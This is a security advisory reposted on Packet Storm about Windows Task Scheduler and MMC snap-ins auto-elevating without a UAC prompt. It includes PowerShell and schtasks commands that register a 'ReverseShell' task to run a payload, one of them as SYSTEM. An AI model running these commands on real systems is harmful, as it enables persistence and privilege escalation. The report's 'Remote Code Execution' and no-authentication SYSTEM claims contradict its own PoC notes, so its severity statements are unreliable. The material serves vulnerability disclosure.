what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Windows Task Scheduler Local Privilege Escalation

Microsoft Windows Task Scheduler Local Privilege Escalation
Posted Jul 19, 2019
Authored by Social Engineering Neo

Microsoft Windows Task Scheduler suffers from a local privilege escalation vulnerability. The Windows MMC auto-elevates members of the 'administrators' group via the GUI and MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC potentially leading to unintentional elevation of privilege.

tags | exploit, local
systems | windows
SHA-256 | 27a3037b9c6d02b2d118a2d8e7f2cadfc535a7b45a10d00413e02cf04227f2c6

Microsoft Windows Task Scheduler Local Privilege Escalation

Change Mirror Download
Microsoft Windows Task Scheduler local EoP Report by Social Engineering Neo.


Affected Platforms: -
Microsoft Windows ≤10


Tested On: -
Windows 10 (build 1809, 1903) & Windows 7 SP1.
Tested on the most recent security patch. (July 2019)


Class: -
Improper Authorization - (CWE-285).
Remote Code Execution.


Summary: - The Typical Computer User Can Trigger Programs at Intervals on any Account existing on the Host System/Domain without Propper Authorization.


Short Description: - The Windows MMC auto-elevates members of the 'administrators' group via the GUI, MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC potentially leading to unintentional EoP.


Long Description: - The built-in Windows component 'Microsoft Management Console' is potentially affected by improper authorization. MMC snap-ins (.msc) auto-elevate users existing in the 'administrators' group including administrator accounts.
: - Only the GUI seems to be affected, this is shown with our simple PowerShell script when you adjust '-Daily -At 9pm' to '-AtLogOn' or '-AtStartUp' additional permissions are required.
: - Whereas the GUI allows "-AtLogOn" without additional permissions.
: - An attacker with the ability to execute 'taskschd.msc' with arguments through the CLI is able to perform this attack with elevated permissions as a payload, therefore exploitability is greatly increased.
: - HIDS/HIPS without specific configurations may not detect such events as alerts or warnings and simply log the event instead, increasing the chances of a system administrator looking past the issue.
: - Enterprise/Personal systems complying with basic security practices are less likely to be affected, the average computer user with default system configuration could be vulnerable to such attacks.


Proof of Concept: - (PowerShell)
#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."

#The above PowerShell script will create a task titled "ReverseShell" with the description "This Task Will Run the Reverse Shell."
#Some additional configuration of the PowerShell may be required.
#We have our own reverse shell payload, its up to you "the attacker" to create your own payload.
#
#NOTE: Task should run everyday at 9pm (system time). You can change this to what suits your needs.
# Task will only have 'user' permissions, this PoC only exists to prove modifying line 9, col 39 & line 3, col 28 to either "AtLogIn" or "AtStartUp" will result in access denied.
# The GUI is automatically elevated, whereas the CLI is not.
# ***We have later noticed this PoC is essentially the same as running `schtasks.exe /Create /SC ONLOGON /TN ReverseShell /TR C:\Users\seneo\Documents\payload-x64.exe /RU "NT AUTHORITY\SYSTEM"` *additional permissions needed for CLI, not GUI*


VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
: - https://youtu.be/_leFNyo5wxM **original**


Expected Result: -
Normal users should not be able to run tasks as other user and execute programs on accounts without proper authorization.


Observed Result: -
Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromisation.


Our Recommendation: -
System Administrators should follow basic security practices to prevent enterprise/client systems being affected with this issue.
Microsoft should prevent the Microsoft Management Console (MMC) snap-ins from auto-elevating without UAC authorization.
The average user should be informed about attacks like this because most "average" users will not understand how they can be affected by attacks such as this.
Proper access control implementations will greatly reduce risk towards enterprise systems.


NVD CVSS v3 Vector: -
AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:P/RL:W/RC:R/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H

CVSS Base Score: - 8.2
Impact Sub score: - 6.0
Exploitability Sub score: - 1.5
CVSS Temporal Score: - 7.2
CVSS Environmental Score: - 5.7
Modified Impact Sub score: - 4.5
Overall CVSS Score: - 5.7


NVD CVSS v2 Vector: -
(AV:L/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:W/RC:UR/CDP:MH/TD:M/CR:L/IR:L/AR:L)

CVSS Base Score: - 6.8
Impact Sub score: - 10.0
Exploitability Sub score: - 3.1
CVSS Temporal Score: - 5.5
CVSS Environmental Score: - 4.8
Modified Impact Sub score: - 7.3
Overall CVSS Score: - 4.8


MITRE CVSS Vector: -
Base Vector: - AV:L/AC:L/Au:S/C:C/I:C/A:C
Base Score: - 6.8


TIMELINE: - Discovery 5th July 2019
: - Initial Report 5th July 2019
: - Case Opened 8th July 2019
: - Added Detail 8th July 2019 *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019
: - Case Closed 9th July 2019
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019 *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)

: - We thank the MSRC team for their quick response.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close